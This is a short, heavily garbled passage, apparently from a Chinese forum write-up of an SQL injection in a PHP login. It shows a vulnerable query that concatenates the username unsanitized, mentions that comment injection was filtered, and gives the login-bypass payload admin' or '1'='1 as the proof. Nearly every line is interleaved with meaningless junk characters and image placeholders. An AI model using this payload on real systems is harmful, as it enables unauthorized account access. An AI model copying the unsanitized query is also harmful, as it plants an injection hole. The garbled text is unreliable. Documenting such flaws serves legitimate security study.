$sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 "; 3 a, ~, K9 G2 {9 Y9 h
2 k! |: p Q& H$ h$ [# V复制代码7 s% H; y- k. ]3 k8 ]& w7 f" _
原本以为注释就完事了 后来发现被过滤l 再看funpost函数 + W8 E1 x! E* H/ y1 t \7 ?; H- E
, D" o% n: R$ W/ f! |7 I$ K
[attach]270[/attach]' w, |4 A* _; c' j' ~
: d' d+ ^2 u7 I7 z* c1 p
0x03 漏洞证明: 1 c; y5 B" J, c9 ]登录用户处填写 admin' or '1'='1 + K/ T9 t+ L) a* X0 H; p; }/ g$ V, g( L. V
[attach]273[/attach] * w" O8 h6 w$ F 6 J: V3 s+ ?/ x# p, W0 ]% e `8 d- E ) K- l2 X+ p2 E# B